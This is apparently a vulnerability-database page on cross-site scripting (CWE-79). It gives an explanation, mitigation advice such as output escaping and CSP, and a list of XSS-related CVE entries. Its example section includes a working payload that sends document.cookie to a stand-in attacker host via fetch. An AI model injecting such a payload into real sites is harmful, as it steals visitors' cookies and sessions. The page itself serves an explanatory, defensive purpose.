Fallos del tipo CWE-79

28.677 resultados

Injeção de Script entre Sites (XSS)

Ocorre quando uma aplicação web insere dados não validados ou não escapados diretamente em páginas HTML, permitindo que um atacante injete código JavaScript malicioso. Esse script é executado no navegador da vítima, roubando cookies, tokens de autenticação ou realizando ações em nome do usuário.

Ejemplo

Um site de comentários que exibe a entrada do usuário sem sanitização: se alguém escreve <script>fetch('http://atacante.com/?cookie='+document.cookie)</script> como comentário, o navegador de quem visualiza executa o script e envia seus cookies para o atacante.

Cómo mitigar

Sempre escapar (ou codificar em HTML) dados vindos do usuário antes de renderizar: use funções como htmlspecialchars() em PHP, textContent ao invés de innerHTML em JavaScript, ou use templates que escapam por padrão (como Jinja2, Vue com v-text). Implemente Content Security Policy (CSP) como camada adicional de defesa.

CVE-2023-0743HIGHCross-site Scripting (XSS) - Generic in answerdev/answerEPSS 0.7%CVE-2024-13830MEDIUMReflected XSS in Ivanti Connect Secure before version 22.7R2.6 and Ivanti Policy Secure before version 22.7R1.3 allows a remote unauthenticaEPSS 0.7%CVE-2024-22191HIGHStored cross-site scripting (XSS) in `key_value` field in AvoEPSS 0.7%CVE-2026-27245CRITICALAdobe Connect | Cross-site Scripting (Reflected XSS) (CWE-79)EPSS 0.7%CVE-2026-76200CRITICALAdobe Commerce | Cross-site Scripting (Stored XSS) (CWE-79)EPSS 0.7%CVE-2021-4363MEDIUMWP Quick FrontEnd Editor <= 5.5 - Reflected Cross-Site ScriptingEPSS 0.7%CVE-2019-25148MEDIUMWP HTML Mail < 2.9.1 - HTML InjectionEPSS 0.7%CVE-2026-34691CRITICALAdobe Experience Manager Forms JEE | Cross-site Scripting (Stored XSS) (CWE-79)EPSS 0.7%CVE-2026-76201CRITICALAdobe Commerce | Cross-site Scripting (Stored XSS) (CWE-79)EPSS 0.7%CVE-2022-30536LOWWordPress WP Maintenance plugin <= 6.0.7 - Authenticated Stored Cross-Site Scripting (XSS) vulnerabilityEPSS 0.7%CVE-2021-29103MEDIUMThere is a reflected Cross Site Scripting (XSS) vulnerability in Esri ArcGIS Server version 10.8.1 and below.EPSS 0.7%CVE-2026-27246CRITICALAdobe Connect | Cross-site Scripting (DOM-based XSS) (CWE-79)EPSS 0.7%CVE-2026-27243CRITICALAdobe Connect | Cross-site Scripting (Reflected XSS) (CWE-79)EPSS 0.7%CVE-2023-5135MEDIUMSimple Cloudflare Turnstile <= 1.23.1 - Authenticated (Contributor+) Stored Cross-Site Scripting via ShortcodeEPSS 0.7%CVE-2021-29109MEDIUMA reflected XSS vulnerability in Esri Portal for ArcGIS version 10.9.EPSS 0.7%CVE-2023-1372HIGHWH Testimonials <= 3.0.0 - Unauthenticated Stored Cross-Site ScriptingEPSS 0.7%CVE-2020-13669—Cross-site Scripting (XSS) vulnerability in ckeditor of Drupal Core allows attacker to inject XSS. This issue affects: Drupal Core 8.8.x verEPSS 0.7%CVE-2021-24323—Woocommerce < 5.2.0 - Authenticated Stored Cross-Site Scripting (XSS)EPSS 0.7%CVE-2022-3513MEDIUMAn issue has been discovered in GitLab affecting all versions starting from 12.8 before 15.8.5, all versions starting from 15.9 before 15.9.EPSS 0.7%CVE-2023-35153CRITICALXWiki Platform vulnerable to stored cross-site scripting in ClassEditSheet page via name parametersEPSS 0.7%